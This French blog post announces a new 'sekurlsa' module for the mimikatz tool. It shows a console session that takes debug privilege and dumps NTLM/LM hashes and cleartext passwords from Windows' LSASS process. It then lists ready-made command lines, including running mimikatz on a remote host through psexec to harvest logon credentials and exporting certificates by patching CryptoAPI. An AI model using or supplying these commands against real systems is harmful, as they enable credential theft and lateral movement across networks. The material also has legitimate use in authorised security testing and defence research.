
sekurlsa
vient d’être incorporé à mimikatz
!
La première version de sekurlsa
(@) fonctionne par injection de la librairie susnommée, la deuxième (::) est un module local de mimikatz
fonctionnant par lecture uniquement !
Après le dernier post sur l’injection de la librairie sekurlsa
, puis celui sur la lecture des clés de déchiffrement depuis LSASS
, il était temps de créer un nouveau module local : mimikatz :: sekurlsa
Nouvelle version !
Le nouveau mimikatz
, en RC pour l’occasion, inclus donc ce nouveau module !
La version prenant en charge ce module est disponible : http://blog.gentilkiwi.com/mimikatz
Il nécessite tout de même, sous NT6, le privilège debug
pour lire des données du processus système LSASS
:
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ // http://blog.gentilkiwi.com/mimikatz mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;234870 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : vm-w8-rp-x msv1_0 : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ wdigest : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ tspkg : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ livessp : n.t. (LUID KO)
L’aide de ce module sera bientôt disponible : http://blog.gentilkiwi.com/mimikatz/sekurlsa.
L’aide de la librairie a été déplacée : http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa.
Ligne de commande
Au passage, mimikatz
peut maintenant prendre en compte ses commandes directement depuis ses arguments.
Quelques exemples sympas :
mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
psexec \\windows-c -s -c c:\security\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
mimikatz crypto::patchcapi crypto::exportCertificates exit
mimikatz nogpo::regedit exit